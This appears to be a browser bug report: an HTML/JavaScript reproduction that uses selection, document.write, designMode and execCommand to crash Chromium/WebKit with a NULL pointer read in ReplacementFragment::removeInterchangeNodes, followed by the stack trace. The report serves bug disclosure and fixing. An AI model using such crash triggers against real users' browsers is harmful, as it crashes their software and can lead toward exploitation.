Created attachment 64706 [details] Repro The following repro triggers a NULL pointer crash in latest Chromium: <html> <head> <script> function go() { selection = getSelection(); range = document.createRange(); document.writeln('<x>'); selection.collapse(document, 1); old_body = document.body; document.write('<textArea>FindAndReplaceMe LeaveMe'); document.close(); document.write(''); document.designMode = "on"; range.insertNode(old_body); document.execCommand("FindString", false, 'FindAndReplaceMe'); document.execCommand("InsertHTML", false, 'Anything'); } </script> </head> <body onload="go()"></body> </html> id: WebCore::ReplacementFragment::removeInterchangeNodes ReadAV@NULL (1cd504e3a7be175da8c6cd72911ea6e0) description: Attempt to read from NULL pointer (+0x24) in WebCore::ReplacementFragment::removeInterchangeNodes stack: WebCore::ReplacementFragment::removeInterchangeNodes WebCore::ReplacementFragment::ReplacementFragment WebCore::ReplaceSelectionCommand::doApply WebCore::EditCommand::apply WebCore::applyCommand WebCore::executeInsertFragment WebCore::executeInsertHTML WebCore::Editor::Command::execute WebCore::Document::execCommand WebCore::DocumentInternal::execCommandCallback v8::internal::HandleApiCallHelper<...> v8::internal::Builtin_HandleApiCall v8::internal::Invoke v8::internal::Execution::Call ...